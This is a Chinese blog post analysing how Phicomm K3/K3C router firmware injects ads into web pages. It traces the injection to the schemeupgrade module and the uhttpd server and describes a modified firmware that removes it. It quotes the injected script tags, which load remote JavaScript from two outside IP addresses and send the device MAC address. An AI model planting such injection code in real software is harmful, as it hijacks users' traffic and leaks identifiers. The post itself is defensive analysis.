关于近期斐讯固件强制推送广告的分析

关于近期斐讯固件强制推送广告的分析有146条评论

2018年8月13日 at 下午10:44分类:路由器 阅读: 15,768 次

【问题表现】
据不少人反馈,斐讯固件目前开始强制推送广告,表现为:
1、会自动弹出http://p.6d63d3.com网站的广告,如网络游戏

2、查看源码,会发现弹出广告的http网站源码中会多出如下注入代码:

<script src=http://172.81.246.180:11211/t.js?MAC=XXXXXXXXXXXX></script>

<script src=http://103.49.209.27:11211/t.js?MAC=XXXXXXXXXXXX></script>

【问题定位】
搜索注入代码的网址“103.49.209.27”,在K3中可以在up_script变量中发现:

搜索up_script变量,可以发现在官方如下文件中存在此变量:

在K3C中搜索“103.49.209.27”,可以在schemeupgrade配置文件中找到:

同时搜索schemeupgrade.config.script,发现在uhttpd这个web服务程序中也会操作此配置项

因此综合K3和K3C的分析,可以判断注入代码与两个模块密切相关,一个是官方的策略升级模块schemeupgrade、一个是官方的web服务程序(httpd或uhttpd)

【解决思路】
1、删除策略升级程序schemeupgrade
2、修改web服务程序,将写入的变量名改变

由于K3C官改在以前已经删除策略升级程序,因此极大可能是web服务程序导致的广告注入代码写入

目前针对此问题的修改固件正在QQ群内测,不久即将开放自动升级,官改版本可以在web页面的“自动升级”页面进行更新

【其他说明】
由于没有源代码,官改版本对官方的修改类似于黑盒方式,大多情况下并不知道可执行程序的内部流程,只能删除或修改配置,很难修改其可执行程序,同时由于反编译分析的难度较高,官改版本无法保证发现官方所有的漏洞和风险
升级后如再出现强制广告问题,可在本文后留言

 

另据反馈,并不是所有官改都会出现此问题,我自己也没有碰到,因此推测可能还有一定的触发条件,比如:

1、强制弹出广告的路由上是否开启了广告屏蔽

2、是否使用了官方APP远程管理或者手机web界面管理